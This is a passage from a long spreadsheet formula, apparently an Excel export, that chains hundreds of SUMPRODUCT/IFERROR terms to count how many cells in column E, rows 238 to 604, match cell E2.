;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$238&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$239&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$240&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$241&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$242&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$243&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$244:$E$245&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$246&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$247&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$248&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$249&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$250&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$251&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$252:$E$253&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$254&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$255&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$256&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$257&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$258&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$259&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$260&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$261&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$262:$E$263&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$264&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$265&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$266&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$267&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$268:$E$269&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$270&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$271:$E$273&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$274&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$275&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$276&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$277&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$278&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$279&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$280&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$281&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$282&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$283&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$284&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$285&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$286&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$287&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$288&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$289&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$290&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$291&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$292&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$293&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$294&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$295&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$296&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$297&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$298&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$299&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$300:$E$301&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$302&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$303&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$304&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$305&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$306&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$307&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$308&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$309&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$310&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$311&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$312:$E$313&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$314&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$315&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$316:$E$317&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$318:$E$319&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$320&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$321&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$322&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$323&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$324&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$325&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$326&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$327&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$328&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$329&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$330&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$331&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$332&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$333&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$334&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$335&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$336&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$337&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$338:$E$339&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$340&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$341&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$342&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$343&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$344&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$345&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$346&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$347&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$348&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$349&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$350&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$351&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$352&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$353&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$354&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$355&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$356&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$357&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$358&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$359&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$360:$E$361&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$362&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$363&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$364&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$365&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$366&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$367&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$368&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$369&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$370&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$371:$E$372&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$373&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$374&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$375&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$376&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$377&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$378&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$379&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$380&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$381&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$382&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$383&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$384&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$385&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$386&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$387&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$388&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$389:$E$390&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$391&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$392&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$393&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$394&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$395&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$396&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$397&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$398&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$399&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$400&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$401&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$402&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$403&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$404:$E$405&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$406:$E$407&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$408&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$409&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$410&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$411&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$412&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$413&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$414:$E$415&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$416&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$417&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$418:$E$419&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$420&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$421&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$422&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$423&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$424&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$425&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$426&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$427&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$428&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$429&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$430&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$431&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$432:$E$433&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$434&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$435:$E$436&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$437&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$438&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$439&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$440:$E$441&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$442&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$443&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$444&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$445&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$446&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$447&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$448&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$449&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$450:$E$451&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$452&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$453&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$454&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$455&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$456&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$457&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$458&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$459&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$460&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$461&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$462&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$463:$E$465&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$466&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$467&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$468&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$469&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$470&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$471&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$472&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$473&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$474&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$475&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$476&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$477&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$478:$E$479&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$480&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$481&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$482&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$483&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$484&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$485&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$486&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$487&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$488&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$489&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$490&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$491&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$492:$E$493&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$494&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$495&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$496&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$497&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$498&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$499&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$500&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$501&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$502&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$503&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$504:$E$505&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$506:$E$507&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$508:$E$509&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$510&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$511:$E$512&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$513:$E$514&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$515&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$516&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$517&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$518&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$519&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$520&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$521&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$522&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$523:$E$524&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$525&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$526:$E$527&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$528&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$529&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$530&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$531&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$532&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$533&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$534&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$535&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$536&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$537&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$538&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$539&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$540&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$541:$E$542&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$543&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$544&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$545&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$546&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$547&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$548&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$549&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$550&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$551&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$552&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$553&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$554&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$555&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$556&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$557&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$558:$E$559&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$560&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$561&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$562&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$563&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$564&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$565&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$566&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$567&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$568&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$569&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$570&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$571&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$572&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$573&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$574&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$575&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$576&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$577&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$578&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$579:$E$580&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$581&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$582&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$583&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$584&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$585&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$586&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$587&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$588:$E$589&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$590&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$591&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$592&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$593&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$594&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$595&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$596&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$597&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$598:$E$599&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$600&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$601&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$602&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$603&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$604&amp;"x")=(E2&amp;"x")),0))+SUMPRODU